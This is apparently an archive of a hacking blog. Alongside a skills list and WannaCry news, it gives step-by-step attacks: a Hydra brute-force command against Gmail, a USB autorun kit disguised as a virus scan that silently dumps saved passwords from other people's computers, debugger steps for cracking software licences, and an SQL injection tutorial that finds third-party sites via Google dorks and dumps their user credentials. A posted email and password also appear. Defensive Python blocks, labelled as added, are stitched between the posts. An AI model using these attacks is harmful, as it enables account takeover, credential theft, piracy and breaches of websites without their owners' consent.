Tuesday, 8 August 2017


How To Become A Professional Hacker: 5 Skills You Need

Here we will talk about 5 hacking skills that will help you become a professional hacker. Check out the list of skills below.


1) Basic computer and Networking skills

You need some basic computer skills to become a hacker. Basic skills mean going beyond the ability to create a Microsoft Word or PowerPoint document. You must learn how to use the command line in Windows, edit the registry and set up network parameters. You must also try to understand networking concepts like IPv4, IPv6, DHCP, NAT, subnetting, DNS, routers and switches, VLANs, the OSI model, public vs. private IP addresses, MAC addressing and ARP.



 

2) Linux Skill

Linux is extremely important if you want to become a pro hacker. If you have zero knowledge of Linux, the best option is to start using it. You can search Google for a Linux tutorial series that will help you gain some knowledge of how to use Linux. The majority of hacking tools are developed for Linux.




3) Virtualization and Security Concepts

Do you know about VirtualBox, VMware, and Workstation? These are virtual platforms where users test their hacks before they take them to the real world. A virtual environment is a safe place where you can test and implement your hacking techniques, so you must learn to use virtualization properly. You must also try to learn about security concepts, because the only way to overcome the roadblocks created by security admins is to be familiar with them.



 

4) Wireless Technologies/Scripting

Wireless technologies are very handy for sending information and data via invisible waves in the air. So, you must first learn and understand how wireless technologies work. You must learn various encryption algorithms like WPA, WPA2, WEP, and WPS. Scripting is another must-have skill. Scripting will help you develop your own unique tools.


5) Database And Web Applications

If you want to become a good hacker then you must learn the SQL language, because this will help you understand databases and how they work. You can also learn major DBMSs like SQL Server, Oracle or MySQL. Web applications are the software we use on the internet via our web browser. Learning the concepts behind web applications will help you make your own web apps to do whatever you want.




These are the five best skills that one needs to master the art of hacking. Hope you liked the article; share it with others too.


Monday, 22 May 2017

Upcoming Cyber Attacks
Radical changes in technology have been observed in recent times: the internet facilitates access to information and instant communication, which leads people and institutions to automate their environment to make it more productive.
The potential offered by having information is also a risk, since there are individuals or organizations (cybercriminals) that commit violent acts; that is, instead of carrying out a robbery with balaclavas and a bladed weapon, they now commit the same act by attacking information systems such as computer networks or databases hosted on remote servers.
These days, the keys of an electronic device are used to hijack or compromise the confidentiality of something as invaluable as data, and then to blackmail the victim by threatening to damage it or by demanding a ransom.
Cyber attacks can be directed at computer systems operating on networks worldwide, and can take down the service they provide, permanently or temporarily, making daily work difficult. The number of people affected may increase as countries join the digital revolution.
Cyber attacks made headlines
Cyber attacks are carried out in order to steal, alter or destroy information maliciously, thereby obtaining money either in cash or in bitcoins (digital money). This type of attack has now become a great threat to any person or company holding valuable digital information.
The main targets of cyber attacks in the current year are government agencies, telecommunications companies and universities. Attacks are also aimed at the theft of credentials and credit cards, and at "internet of things" devices, so companies are finding it necessary to take measures to manage IT risks.
Why take action? The goal is to predict and safeguard critical assets, systems and data with cybersecurity programs that include tools, protocols and trained personnel to combat the growing number of cyber attacks.
WannaCry Case
In recent days several countries have been attacked by a computer virus called "WannaCry". It is a wave of mass-propagating ransomware that encrypts important documents on a computing device and a network so that they cannot be opened; the screen warns the user that they have been the victim of a digital attack and that they must pay a sum of money to regain access to their data.
Several experts in the field say that the virus relies on a security flaw in Windows, especially in obsolete versions, which is why it spreads so rapidly. In addition, users have not taken the necessary precautions such as updating the operating system, applying the patch or using a good antivirus.
Results of the cyber attack
One of those affected by this virus was the telecommunications sector in Spain: at the company Telefónica, 85% of the equipment became infected, and the attack rapidly escalated nationally and internationally, reaching health organizations and all types of networks.
What happened is very serious because of the material losses, so it should be taken as a lesson to make everyone aware of the value of security and of how vulnerable we are to cyber attacks.
Although reacting in time minimizes the consequences, not all companies invest in or give importance to this threat by taking protection and detection measures to reduce the impact of attacks.
To conclude, cyber attacks are unpredictable; the only way to detect and prevent information theft is to have a customized and adaptable security platform that can combat threats that are invisible to standard security defenses.

Monday, 15 May 2017

Wanna Cry Ransomware Attack | All You Need To Know About It





The Wanna Cry ransomware attack, also called WannaCrypt, WanaCrypt0r 2.0 or Wanna Decryptor, is ransomware affecting the Microsoft Windows operating system. This Friday, May 12 2017, a huge cyber-attack was launched using Wanna Cry, infecting over 230,000 computers in 150 countries around the globe and demanding ransom payments in the cryptocurrency Bitcoin in 28 languages. The attack has been described by Europe as unprecedented in scale.

What exactly does Wanna Cry Ransomware Attack do?

Ransomware like Wanna Cry works by encrypting most or even all of the files on a user's PC. The software then demands that a ransom be paid in order to have the files decrypted. In the case of Wanna Cry specifically, the software demands that the victim pay a ransom of $300 in bitcoins at the time of infection. If the user doesn't pay the ransom within three days, the amount doubles to $600. After seven days without payment, Wanna Cry will delete the encrypted files and all data will be lost.

Here is a full list of the filetypes that are targeted and encrypted by Wanna Cry Ransomware Attack:

  • .123
  • .3dm
  • .3ds
  • .3g2
  • .3gp
  • .602
  • .7z
  • .ARC
  • .PAQ
  • .accdb
  • .aes
  • .ai
  • .asc
  • .asf
  • .asm
  • .asp
  • .avi
  • .backup
  • .bak
  • .bat
  • .bmp
  • .brd
  • .bz2
  • .cgm
  • .class
  • .cmd
  • .cpp
  • .crt
  • .cs
  • .csr
  • .csv
  • .db
  • .dbf
  • .dch
  • .der
  • .dif
  • .dip
  • .djvu
  • .doc
  • .docb
  • .docm
  • .docx
  • .dot
  • .dotm
  • .dotx
  • .dwg
  • .edb
  • .eml
  • .fla
  • .flv
  • .frm
  • .gif
  • .gpg
  • .gz
  • .hwp
  • .ibd
  • .iso
  • .jar
  • .java
  • .jpeg
  • .jpg
  • .js
  • .jsp
  • .key
  • .lay
  • .lay6
  • .ldf
  • .m3u
  • .m4u
  • .max
  • .mdb
  • .mdf
  • .mid
  • .mkv
  • .mml
  • .mov
  • .mp3
  • .mp4
  • .mpeg
  • .mpg
  • .msg
  • .myd
  • .myi
  • .nef
  • .odb
  • .odg
  • .odp
  • .ods
  • .odt
  • .onetoc2
  • .ost
  • .otg
  • .otp
  • .ots
  • .ott
  • .p12
  • .pas
  • .pdf
  • .pem
  • .pfx
  • .php
  • .pl
  • .png
  • .pot
  • .potm
  • .potx
  • .ppam
  • .pps
  • .ppsm
  • .ppsx
  • .ppt
  • .pptm
  • .pptx
  • .ps1
  • .psd
  • .pst
  • .rar
  • .raw
  • .rb
  • .rtf
  • .sch
  • .sh
  • .sldm
  • .sldx
  • .slk
  • .sln
  • .snt
  • .sql
  • .sqlite3
  • .sqlitedb
  • .stc
  • .std
  • .sti
  • .stw
  • .suo
  • .svg
  • .swf
  • .sxc
  • .sxd
  • .sxi
  • .sxm
  • .sxw
  • .tar
  • .tbk
  • .tgz
  • .tif
  • .tiff
  • .txt
  • .uop
  • .uot
  • .vb
  • .vbs
  • .vcd
  • .vdi
  • .vmdk
  • .vmx
  • .vob
  • .vsd
  • .vsdx
  • .wav
  • .wb2
  • .wk1
  • .wks
  • .wma
  • .wmv
  • .xlc
  • .xlm
  • .xls
  • .xlsb
  • .xlsm
  • .xlsx
  • .xlt
  • .xltm
  • .xltx
  • .xlw
  • .zip

It also places a text file containing the Wanna Cry ransom note on the user's desktop.


How can I protect myself from Wanna Cry Ransomware Attack?

Regardless of which operating system you run, you should install all available security updates immediately. In particular, Windows users with machines that run Windows XP, Windows 8, or Windows Server 2003 should promptly install this security update released on Friday by Microsoft.



Wanna Cry Ransomware Attack | MICROSOFT PATCH

Microsoft on Saturday took the unusual step of releasing free software patches for older, unsupported Windows systems like XP.

The US tech company had already developed a fix for the EternalBlue exploit and had released it as part of an optional security update for Windows users fourteen days before EternalBlue's existence was made public.

However, it is likely that some PCs, presumably including those affected in the Wanna Cry ransomware attack, failed to upgrade to the new patch level. Moreover, the patch was not offered for Windows XP, a version of the operating system that is no longer supported by Microsoft.

In any case, that changed on Saturday, with Microsoft making security patches available for free for the older Windows systems as well. Notably, a Kaspersky report from last October had warned that most ATMs in India were at risk since they used Windows XP.



Wanna Cry ransomware attack

The emerging Wanna Cry ransomware attack, which used an exploit first developed by the US NSA, appeared to be slowing on Saturday. Edward Snowden criticized the NSA, saying the US spy agency has been building dangerous attack tools despite warnings.

The Wanna Cry ransomware attack - one of the largest ever cyber attacks - appeared to slow around 24 hours after it wreaked havoc and shut down a huge number of computer systems across 104 countries.

The slowdown came shortly after 'MalwareTech', a Britain-based security researcher, accidentally found an 'off button' to halt the Wanna Cry ransomware attack. Experts, however, warned that enterprising hackers could get around MalwareTech's fix.

More than 200,000 systems around the world were affected in the Wanna Cry ransomware attack, a tracker created by a security researcher called "MalwareTech" showed. Czech Republic-based antivirus provider Avast, however, gave a more conservative estimate of around 126,000 systems being affected, news agency Reuters reported.



Wanna Cry Ransomware Attack Targeting India:

India was among the countries worst affected by the Wanna Cry ransomware attack, data shared by Kaspersky, a Russian antivirus company, showed. According to initial calculations performed shortly after the malware struck on Friday night, around five per cent of all computers affected in the attack were in India.

Mikko Hypponen, chief research officer at a Helsinki-based cyber security company called F-Secure, told news agency AFP that it was the biggest ransomware outbreak in history and estimated that 130,000 systems in more than 100 countries had been affected.

Hypponen added that Russia and India were hit particularly hard, largely because Microsoft's Windows XP - one of the operating systems most at risk - was still widely used in those countries.

News agency IANS reported that police computers across 18 units in Andhra Pradesh's Chittoor, Krishna, Guntur, Visakhapatnam and Srikakulam districts were affected. However, apart from that, there was no immediate information on the extent of the Wanna Cry ransomware attack's hold on Indian systems.

What Actually Happened with Wanna Cry Attack:

  • On Friday, media reports began highlighting that a Wanna Cry ransomware attack had brought down computer systems in UK hospitals. It soon emerged that the attack was global, with reports of affected computers coming in from all over the globe.

  • The ransomware - Wanna Cry - infected computers and encrypted all the data stored on the hard drives. In return for decrypting the data, Wanna Cry demanded payment ranging from $300 (around Rs 19,000) to $600 (around Rs 39,000) in bitcoin.

  • As of Saturday, no hacker or hacker group had come forward to claim responsibility for the cyber attack, which used an exploit originally developed by the US NSA. The European Cybercrime Centre stated, "The current attack is at a remarkable level and will require a mind boggling worldwide examination to distinguish the offenders."

  • Some experts said the threat had receded as of Sunday, partly because MalwareTech registered a domain that he noticed the malware was trying to connect to, limiting Wanna Cry's spread. Microsoft also issued emergency security patches for a range of Windows versions.

  • The Indian Computer Emergency Response Team (ICERT or CERT-In) was said to be monitoring the situation constantly. Earlier on Saturday, CERT-In was reported to have issued an advisory asking computer users in India to upgrade their systems to the latest Windows patch level.

  • In Brazil, the social security system had to disconnect its computers and cancel public access. The state-owned oil company Petrobras and Brazil's Foreign Ministry also disconnected computers as a precautionary step, and court systems went down, too.

  • In Russia, government agencies insisted that all attacks had been resolved. The Russian Interior Ministry, which runs the national police, said the problem had been "limited" with no data compromised. Russia's health ministry said its attacks were "successfully repulsed."

  • Germany's national railway said Saturday that departure and arrival display screens at its train stations were affected, but there was no impact on actual train services. Deutsche Bahn said it deployed extra staff to help customers.

  • French carmaker Renault's assembly plant in Slovenia halted production after it was targeted. Radio Slovenia said Saturday the Revoz factory in the southeastern town of Novo Mesto stopped working Friday night to prevent the malware from spreading.

  • Elsewhere in Europe, the attack hit Spain's Telefonica, a global broadband and telecommunications company, and knocked ticketing offline for Norway's IF Odd, a 132-year-old soccer club.

  • "I accept many organizations have not yet seen," said William Saito, a cyber security adviser to Japan's government. "Things could likely rise on Monday" as staff return to work.

  • China's information security watchdog said "a bit" of Windows systems users in the country were infected, according to a notice posted on the official Weibo page of the Beijing branch of the Public Security Bureau on Saturday. Xinhua state news agency said some secondary schools and universities were hit.


Monday, 13 October 2014

Hacking Gmail account password with kali linux | 2017

Gmail is one of the most popular email services in the world. In this article I will show you how to hack a Gmail account password with Kali Linux 2017. Gmail hacker ??? oh oh oh...!

Have you ever wondered whether you can hack a Gmail account password for free in 2017? It is simple enough that you can do it, depending on your luck.

To understand any password hacking technique you need to know about password hacking techniques, and you need a word-list for this purpose.

My email: hackersohail@gmail.com
Password: hackedaccount

In this article I am using the Hydra tool to brute-force a Gmail account. Password brute-forcing depends completely on the length of your password list and your luck.

Here is how to hack a Gmail account password with Kali Linux:

Steps:
Log in to Kali Linux or BackTrack.

Now open a terminal, type "hydra" and enter the following command.

(The Gmail Password cracking Syntax will be like)

syntax:
hydra -S -l <email> -P <filepath/yourlist.txt> -e ns -V -s 465 smtp.gmail.com smtp

For example, I want to hack my own Gmail account, so my command will be:

root@RumyKali:~# hydra -S -l hackersohail@gmail.com -P "/root/Desktop/pw list 1.txt" -e ns -V -s 465 smtp.gmail.com smtp


It will try all the passwords present in your word-list. When it finds a valid password it will stop scanning and notify you “One valid Password found“.

Enjoy hacking Gmail account password...
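
Seen from the mail server, the dictionary attack described above is a burst of failed SMTP AUTH attempts from one client. The following is an added example, not code from the original post: it scans Postfix-style log lines (constructed sample data) and flags source addresses that cross a failure threshold inside a sliding window; the threshold, window and function name are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines in the style Postfix logs failed SASL logins.
SAMPLE_LOG = """\
May 15 10:00:01 mx1 postfix/smtps/smtpd[2101]: warning: unknown[203.0.113.9]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
May 15 10:00:03 mx1 postfix/smtps/smtpd[2101]: warning: unknown[203.0.113.9]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
May 15 10:00:05 mx1 postfix/smtps/smtpd[2101]: warning: unknown[203.0.113.9]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
May 15 10:00:07 mx1 postfix/smtps/smtpd[2101]: warning: unknown[203.0.113.9]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
May 15 10:00:09 mx1 postfix/smtps/smtpd[2101]: warning: unknown[203.0.113.9]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
May 15 10:00:11 mx1 postfix/smtps/smtpd[2101]: warning: unknown[203.0.113.9]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
May 15 10:02:00 mx1 postfix/smtps/smtpd[2150]: warning: mail.example.net[198.51.100.4]: SASL PLAIN authentication failed:
May 15 10:02:40 mx1 postfix/smtps/smtpd[2150]: warning: mail.example.net[198.51.100.4]: SASL PLAIN authentication failed:
May 15 10:02:55 mx1 postfix/smtps/smtpd[2150]: 4F1A22C0: client=mail.example.net[198.51.100.4], sasl_method=PLAIN, sasl_username=alice@example.org
May 15 10:10:00 mx1 postfix/smtps/smtpd[2203]: warning: unknown[192.0.2.77]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
May 15 10:13:00 mx1 postfix/smtps/smtpd[2203]: warning: unknown[192.0.2.77]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
May 15 10:16:00 mx1 postfix/smtps/smtpd[2203]: warning: unknown[192.0.2.77]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
"""

# Timestamp, host, postfix process, then the "SASL <mech> authentication failed" warning.
FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s\S+\spostfix/[\w/]+\[\d+\]:\swarning:\s"
    r"\S+\[(?P<ip>[0-9a-fA-F.:]+)\]:\sSASL\s[\w-]+\sauthentication failed"
)


def find_bruteforce_sources(lines, threshold=5, window=timedelta(seconds=60), year=2017):
    """Return {ip: time the threshold was first crossed} for noisy clients.

    Syslog timestamps carry no year, so the caller supplies one (assumption).
    These failure lines carry no username, so the count is per source address.
    """
    recent = defaultdict(deque)  # ip -> failure times still inside the window
    flagged = {}
    for line in lines:
        m = FAILED.match(line)
        if not m:
            continue  # successful logins and unrelated lines are ignored
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        times = recent[m["ip"]]
        times.append(ts)
        # Drop failures that have aged out of the sliding window.
        while ts - times[0] > window:
            times.popleft()
        if len(times) >= threshold and m["ip"] not in flagged:
            flagged[m["ip"]] = ts
    return flagged


if __name__ == "__main__":
    for ip, when in find_bruteforce_sources(SAMPLE_LOG.splitlines()).items():
        print(f"{ip} crossed the failure threshold at {when}")
```

The third client in the sample guesses once every three minutes and stays under the threshold, which is why rate-based detection is paired with per-account lockout and a second factor.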

Friday, 18 April 2014

Hack PC password using pendrive:

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exist many tools for recovering these passwords from their stored places. Using these tools and a USB pendrive you can create your own rootkit to hack passwords from your friend’s/college computer.




steps:

1) Download all the tools mentioned below

MessenPass : http://goo.gl/WeG7lM

Mail PassView : http://goo.gl/80Nw3Q

IE Passview : http://goo.gl/e6q5Ys

Protected Storage PassView : http://goo.gl/GGbhgx

PasswordFox : http://goo.gl/hcs8F7


Note: If any link doesn't work then you can google it and download it


2) Download all 5 tools, extract them and copy only the executable files (.exe files) onto your USB pendrive.

i.e. copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe onto your USB drive.


3) Create a new Notepad and write the following text into it:

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

Save the Notepad file and rename it from New Text Document.txt to autorun.inf. Now copy the autorun.inf file onto your USB pen-drive.


4) Create another Notepad and write the following text onto it:

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

Save the Notepad and rename it from New Text Document.txt to launch.bat. Copy the launch.bat file to your USB drive.


5) Now your rootkit is ready and you are all set to sniff the passwords. You can use this pen-drive on any computer to sniff the stored passwords. Just follow these steps:

Insert the pen-drive and the auto-run window will pop-up. (This is because, we have created an auto-run pen-drive).

In the pop-up window, select the first option (Perform a Virus Scan).

Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

Remove the pen-drive and you’ll see the stored passwords in the .TXT files.


NOTE: This can only obtain saved email IDs and passwords, not ones that are not saved.
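
For triage of a found or returned USB stick, the autorun.inf and launch.bat from steps 3 and 4 can be inspected as text without running anything. An added example, not part of the original post: it flags a script or executable as the open= target, action text that poses as a security feature, and launcher lines that dump tool output with /stext; the keyword lists, function names and the benign sample are assumptions.

```python
import re

# Text of the two files exactly as steps 3 and 4 of the post describe them.
AUTORUN_FROM_POST = "[autorun]\nopen=launch.bat\nACTION= Perform a Virus Scan\n"
LAUNCHER_FROM_POST = (
    "start mspass.exe /stext mspass.txt\n"
    "start mailpv.exe /stext mailpv.txt\n"
    "start iepv.exe /stext iepv.txt\n"
    "start pspv.exe /stext pspv.txt\n"
    "start passwordfox.exe /stext passwordfox.txt\n"
)
# Constructed benign sample: a drive that only sets an icon and a label.
BENIGN_AUTORUN = "[AutoRun]\nicon=setup.ico\nlabel=Backup Drive\n"

# Assumed lists; tune them for your environment.
SCRIPT_EXT = (".bat", ".cmd", ".vbs", ".js", ".ps1", ".exe", ".scr", ".com")
LURE_WORDS = ("scan", "virus", "security", "protect", "update")


def parse_autorun(text):
    """Return key/value pairs of the [autorun] section, keys lower-cased."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def first_token(command):
    """Program part of a command line, honouring a leading quoted path."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0]
    return command.split()[0] if command else ""


def triage_autorun(text):
    """List the reasons this autorun.inf deserves a closer look."""
    entries = parse_autorun(text)
    findings = []
    for key in ("open", "shellexecute"):
        program = first_token(entries.get(key, "")).lower()
        if program.endswith(SCRIPT_EXT):
            findings.append(f"{key}= launches {program}")
    action = entries.get("action", "")
    launches = "open" in entries or "shellexecute" in entries
    if launches and any(word in action.lower() for word in LURE_WORDS):
        findings.append(f"action= poses as a security feature: {action!r}")
    return findings


# "start tool.exe /stext out.txt": a tool told to write its results to a file.
DUMP_LINE = re.compile(r"^\s*(?:start\s+)?(?P<prog>\S+\.exe)\s+/stext\s+(?P<out>\S+)", re.I)


def triage_launcher(text):
    """Return (program, output file) for every line that dumps with /stext."""
    matches = (DUMP_LINE.match(line) for line in text.splitlines())
    return [(m["prog"].lower(), m["out"]) for m in matches if m]


if __name__ == "__main__":
    for finding in triage_autorun(AUTORUN_FROM_POST):
        print("autorun.inf:", finding)
    for program, out in triage_launcher(LAUNCHER_FROM_POST):
        print(f"launch.bat: {program} writes results to {out}")
```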




Wednesday, 9 April 2014

Bypass Software Registration 2017 | Simple steps:

If you've ever wondered how software pirates can take software and crack it time and time again, even with security in place, this small series on how to bypass software registration is for you. Even with today's most advanced anti-piracy methods in place, it is still relatively easy to crack almost any program in the world. This is mainly because a computer process can be completely manipulated with an assembly debugger. Using one, you can crack the software license process by making the application skip its key code verification without a valid key. This works because assembly allows you to speak directly to the processor and force a skip over the registration process, so the software can be used for a lifetime without a license key.




Let's go over how cracking could work in practice by looking at an example program (a program that serves no purpose other than for me to hack).

I will not be walking you through cracking a legitimate program with ollydbg, because I can't just crack a program for demonstration, but the techniques applied to my examples should give you the foundation needed to create your own. At that point, it's a test of your morals whether you use your knowledge for good or bad.






 

 Bypass software registration requirements:

  • Windows (for examples only, debuggers exist across platforms)
  • A debugger installed: IDA, ollydbg, etc. (ollydbg will be used in examples)

Let me take you through the simple steps that help you bypass software registration.





First, run the program that you are attempting to reverse engineer and try to activate it with a random key to verify that you need a valid software key to proceed. This is to verify that we can come up with the keys.



How to crack any software using ollydbg:

  1. Run ollydbg.
  2. Open up the program you wish to bypass with ollydbg.
  3. Click the play button to run the program with the debugger attached.
  4. Right click the CPU window, and click Search For > All intermodular calls.
  5. Search for high interest DLL calls. GETDLGITEMTEXT will be for dialog boxes, which get called when you try to enter a software key. By stepping into the function with the debugger, we can examine the registration specifically. SENDDLGITEM could be used as well.
  6. Test to see which one works to break out of the activation loop by right clicking the DLL call and setting a breakpoint for all instances of that call.
  7. Resume the program and enter any software key you feel like. If the debugger breaks (pauses the program's execution) after entering your key, then you know you found the right DLL call in step 5.
  8. Press F8 back in the CPU window to force the next step until you get to the TEST EAX. EAX is the return of a value, which means that a check is being performed here. Upon examination, we can see that the EAX is checking for a number that is not equal to a null value. This means that if it is replaced with anything other than null, it will run.
  9. Right-click the EAX and change it in hex value to 1, instead of 0.
  10. Resume the program again, and you will have successfully activated the program.
  11. And for proof it was registered to me:

Monday, 7 April 2014

Test SQL Injection Attack | Website Hacking 100% working


Warning: 

This tutorial, Test SQL Injection Attack | Website Hacking 100% working, is for educational purposes, to make you aware of SQL injection vulnerabilities that may be present in your website so that you can test a website you own and improve its security. The person posting this and this blog are not responsible for any type of malicious activity performed by anyone else,,,,!!!




What is SQL Injection Attack? 


So let me give you some idea of what I am going to talk about and how we can perform Website Hacking using SQL Injection Attack.


There are many complex definitions you may get in various other sites,,, 


But I put it in simple terms,,,, You type some SQL queries or codes [or whatever you wish to call it] on the address bar [where you type the web address of sites to be searched] to test vulnerable website,,,,!!!


If you find it vulnerable then BINGO,,,!!!


we will use some more SQL injection queries for website hacking using an SQL injection attack,,,!!!


So guyzzz who are related to computer science stream,,, If you found learning SQL boring this is one way to make yourself interested in.


And as far as others are concerned,,, please don't worry I will be giving you some codes which you may use to Test the Vulnerability of the site,,,!!!


You must also learn how to prevent SQL injection attacks.


So....... lets begin....!!!


Test SQL Injection Attack:


QUICK STEPS:


follow the below given steps carefully where I will be demonstrating website hacking using SQL injection attack. 


Step 1:


Search for any of the following terms in Google: 

inurl:product.php?id= 

inurl:index.php?id= 

inurl:news.php?id= 

inurl:shop.php?id= 

inurl:shop.php?pid= 

inurl:newsroom.php?id=


Step 2:

Now, for example, say there is a website that you found in the Google search:


www.rahulswebsite.com/index.php?id=7 


Open the website in a new tab,,,!!!


Step 3: 

To test if your selected website is vulnerable:


Add the ' (single quote symbol) after the site as follows www.hackersohail.com/index.php?id=7'


and now Hit the "Enter" Key,,,!!!


If there is any type of "MySQL error" !!!BINGO,,,!!!


Then it means your target website is vulnerable.


Website Hacking using SQL Injection Attack:


Step 1:

After finding the vulnerability of your target site, use the ORDER BY command to extract the number of columns in the database.


Ex Code:

http://www.anywebsite.com/index.php?id=7 ORDER BY 1-- 


Doing ORDER BY 1-- should always return the original page with NO error. 


Step 2: 

Then do ORDER BY 2-- 


If this shows the original page with NO error, continue.


Step 3:

Now try ORDER BY 3--


and so on, 


If this shows the original page with NO error, continue. 


Step 4: 

Continue increasing the ORDER BY number until you reach an error. 


For example, if doing ORDER BY 10-- returns an error, then there is a table which has NINE (9) columns, NOT 10. 


Always subtract ONE from the number that produced the error.


STEP 5:

Next step is to use UNION & SELECT 


After getting the number of columns, let's say we have NINE columns. Then you have to type the following code: 


Code: 

http://www.anywebsite.com/index.php?id=7 UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- 


You should see a page with a few numbers scattered throughout it. If so, continue, 


IF NOT, try the following, in which we add the " - " hyphen or negative sign in front of the id value of our website:


Code: 

http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,2,3,4,5,6,7,8,9--


At the end if this produces the scattered numbers, continue, if not, STOP!!!


Choose another target website from the GOOGLE search and repeat the vulnerability test,,,!!!


Step 6: 

Now we use the database() command 


After you see the scattered numbers, pick one to exploit. Say the numbers on my page are TWO and SEVEN. 


I will choose the number TWO. After choosing your number, put database() in place of it in your URL as shown below. REMEMBER, I chose number TWO.


Code:

http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,database(),3,4,5,6,7,8,9-- 


That should return some text in place of the scattered TWO. WRITE THIS TEXT DOWN, and move on.


Step 7: 

We use group_concat


This is where everything gets a little trickier! This is also the part where you will be extracting data. Yeah! Bingoo!!! :D :D *** Fist punch *** 


After extracting the name of the database using database(), type this where you typed database() in the previous step. 


Code:

http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()--



TYPE THIS EXACTLY AS IT IS SHOWN, and press enter. 


In place of the scattered TWO, you should see a LOT of text separated by commas. These are called tables. The text varies by website, but you usually want to look for things like "admin," "staff," or "users." Choose the one that interests you. For this tutorial, I will choose "users." Now type this: 



Code: 

http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database()-- 


OR 


if you want the columns from ONLY one table, use this (courtesy of dR..EviL): 


Code: 

http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_name=< table name goes here in hex or ascii format >-- 


This should return even more text. These are called columns. Again choose what interests you, but for this tutorial, I will choose "username" and "password." 


The columns "username" and "password" contain the data we want to extract. To extract the final data, meaning, in this case, the usernames and passwords of all the users, type this: 


Code: 

http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(username,0x3a,password,0x3a),3,4,5,6,7,8,9 from users-- 


Where it says "username,0x3a,password,0x3a" is where you would put the names of your chosen COLUMNS, such as username and password. DO NOT replace the 0x3a, ONLY the username and password area. Where it says "from users--," replace "users" with the name of your chosen table, such as "users." All of this will produce even MORE text in this format: 


Code: 

admin:thisismypass:, 

The comma separates each set of data. 
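
Since the post says you must also learn how to prevent SQL injection, here is the defensive side as an added example (not code from this blog): the same lookup written the vulnerable way and the hardened way, each fed the probes from the steps above. Python with an in-memory SQLite table stands in for the PHP/MySQL site; the table, data and function names are made up, and the table has 3 columns rather than 9.

```python
import re
import sqlite3


def make_db():
    """In-memory stand-in for the site's database (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news  (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO news  VALUES (7, 'Launch day', 'constructed sample row');
        INSERT INTO users VALUES ('admin', 'constructed-sample-hash');
    """)
    return db


def news_vulnerable(db, raw_id):
    # BEFORE: the id= value from the URL becomes part of the SQL text, so a
    # quote, ORDER BY or UNION typed in the address bar is parsed as SQL.
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    return db.execute(sql).fetchall()


ID_RE = re.compile(r"[0-9]{1,9}")


def news_hardened(db, raw_id):
    # AFTER, layer 1: accept only what an id can be; anything else is refused.
    if not ID_RE.fullmatch(raw_id):
        raise ValueError("invalid id")
    # Layer 2: bound parameter, so the value never reaches the SQL parser as text.
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()


def outcome(handler, db, raw_id):
    """What a visitor would observe: rows, a generic rejection, or a DB error."""
    try:
        handler(db, raw_id)
        return "rows"
    except ValueError:
        return "rejected"   # answer with a plain HTTP 400 and no detail
    except sqlite3.Error:
        return "db_error"   # the visible database error that Step 3 looks for


# The probes from this tutorial, adapted to a 3-column table.
PROBES = [
    "7",                            # normal request
    "7'",                           # single-quote test
    "7 ORDER BY 3--",               # column counting, still in range
    "7 ORDER BY 4--",               # column counting, one past the end
    "-7 UNION ALL SELECT 1,2,3--",  # the "scattered numbers" probe
]


def compare():
    """Map each probe to (vulnerable outcome, hardened outcome)."""
    db = make_db()
    return {
        probe: (outcome(news_vulnerable, db, probe), outcome(news_hardened, db, probe))
        for probe in PROBES
    }


if __name__ == "__main__":
    for probe, (before, after) in compare().items():
        print(f"{probe!r:32} vulnerable={before:9} hardened={after}")
```

Every probe except the plain `7` is refused by the hardened version before any SQL runs, and because database errors are never shown to the visitor, the single-quote test gives no signal either.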

